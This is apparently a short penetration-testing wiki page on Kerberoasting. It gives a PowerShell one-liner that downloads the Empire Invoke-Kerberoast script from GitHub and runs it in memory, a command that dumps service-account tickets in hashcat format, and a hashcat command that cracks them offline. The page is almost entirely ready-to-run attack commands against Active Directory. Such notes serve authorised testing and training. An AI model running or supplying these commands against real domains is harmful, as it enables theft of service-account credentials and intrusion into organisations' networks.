Get SPN Account Ticket with Invoke-Kerberoast

Installing Invoke-Kerberoast script

Lets first get the Powershell Invoke-Kerberoast script.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

Loading into Memory

Now lets load this into memory:

Invoke-Kerberoast -OutputFormat hashcat |fl

You should get a SPN ticket.

Cracking Hash using Hashcat

The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100

hashcat -m 13100 -a 0 hash.txt wordlist --force

PreviousEnumerating SPN Accounts with Powershell NextKerberoasting with Rubeus & Impacket

Last updated 2 years ago